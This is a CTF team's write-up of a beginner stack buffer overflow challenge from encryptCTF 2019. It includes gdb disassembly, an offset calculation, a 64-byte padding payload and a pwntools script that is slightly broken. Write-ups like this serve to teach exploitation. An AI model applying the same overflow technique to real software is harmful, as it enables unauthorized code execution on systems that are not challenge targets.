encryptCTF 2019 Pwn Write-up 1 of 5

2 minute read

First pwn board wipe of the year. hsb represent! 
First pwn board wipe of the year. hsb represent! 

Pwn0 Solution (25 pts.)

This challenge tackles basic stack buffer overflow — writing a specific value on the exact address needed.

Let’s examine the binary.

Commands used: `file` and `gdb` `checksec`

Upon checking, we can see that the file is a 32-bit ELF executable, and Canary, PIE and RelRo are disabled. Hence, we can try to do a buffer overflow to overwrite the saved return address.

Let’s try to run the binary.

Who tf is josh?!? lol

The program asks for a user input. Let’s try to enter a test string.

After giving a user input, the program will terminate. Let’s disassemble the binary to understand the program flow.

gef➤  disas main  
Dump of assembler code for function main:  
   0x080484f1 <+0>: push   ebp  
   0x080484f2 <+1>: mov    ebp,esp  
   0x080484f4 <+3>: and    esp,0xfffffff0  
   0x080484f7 <+6>: sub    esp,0x60  
   0x080484fa <+9>: mov    eax,ds:0x80498a0  
   0x080484ff <+14>: mov    DWORD PTR [esp+0xc],0x0  
   0x08048507 <+22>: mov    DWORD PTR [esp+0x8],0x2  
   0x0804850f <+30>: mov    DWORD PTR [esp+0x4],0x0  
   0x08048517 <+38>: mov    DWORD PTR [esp],eax  
   0x0804851a <+41>: call   0x80483d0 <setvbuf@plt>  
   0x0804851f <+46>: mov    DWORD PTR [esp],0x804861d  
   0x08048526 <+53>: call   0x8048390 <puts@plt> (1)**  
   0x0804852b <+58>: lea    eax,[esp+0x1c]  
   0x0804852f <+62>: mov    DWORD PTR [esp],eax  
   0x08048532 <+65>: call   0x8048370 <gets@plt> (2)**  
   0x08048537 <+70>: mov    DWORD PTR [esp+0x8],0x4  
   0x0804853f <+78>: mov    DWORD PTR [esp+0x4],0x804862d  
   0x08048547 <+86>: lea    eax,[esp+0x5c]  
   0x0804854b <+90>: mov    DWORD PTR [esp],eax  
   0x0804854e <+93>: call   0x8048380 <memcmp@plt> (3)**  
   0x08048553 <+98>: test   eax,eax   
   0x08048555 <+100>: jne    0x804856a <main+121>  
   0x08048557 <+102>: mov    DWORD PTR [esp],0x8048632  
   0x0804855e <+109>: call   0x8048390 <puts@plt>  
   0x08048563 <+114>: call   0x80484dd <print_flag> (4)**  
   0x08048568 <+119>: jmp    0x8048576 <main+133>  
   0x0804856a <+121>: mov    DWORD PTR [esp],0x8048648  
   0x08048571 <+128>: call   0x8048390 <puts@plt>  
   0x08048576 <+133>: mov    eax,0x0  
   0x0804857b <+138>: leave    
   0x0804857c <+139>: ret      
End of assembler dump.

Upon inspection, we can see that the binary runs like this —

(1) - puts() - prints "How's the josh?"  
(2) - gets() - Asks for input and stores @ `$esp+0x1c  
(3) - memcmp() - Compares the contents of `0x804862d` and `$esp+0x5c`. If the addressses have the same content, the program will proceed to call print_flag  
(4) - print_flag() - calls system("cat flag.txt")

disassembled print_flag function.

Based on the findings above, we need to control the value of $esp+0x5c in order to get the flag. Since the program uses gets(), there is no limit on the input string. Hence, we can overwrite the value of $esp+0x5c from our input address of $esp+0x1c.

Let’s compute the distance of the two addresses.

offset = 0x5c - 0x1c  
offset = 0x40 or 64

We need to pad our input with 64 bytes to control the value of $esp+0x5c.

Next, we need to identify the value needed for memcmp(). Let’s check the value written on 0x804862d.

H!gh. Josh is H!gh. Hmmmm 

Now, let’s build our payload.

payload = [64 bytes buffer] + "H!gh"

Let’s try to send the payload!

We got the flag

The payload worked! And we got the flag 

Flag: encryptCTF{L3t5_R4!53_7h3_J05H}

Sample payload script:


from pwn import *

r = remote('', 1234)


offset = 64  
payload = "A"*offset  
payload += "H!ghx00"

log.info('Sending payload...')


log.info('Here's your flag ')  
log.info('Flag: {}'.format(r.recvline()))


— ar33zy

hackstreetboys aka [hsb] is a CTF team from the Philippines.

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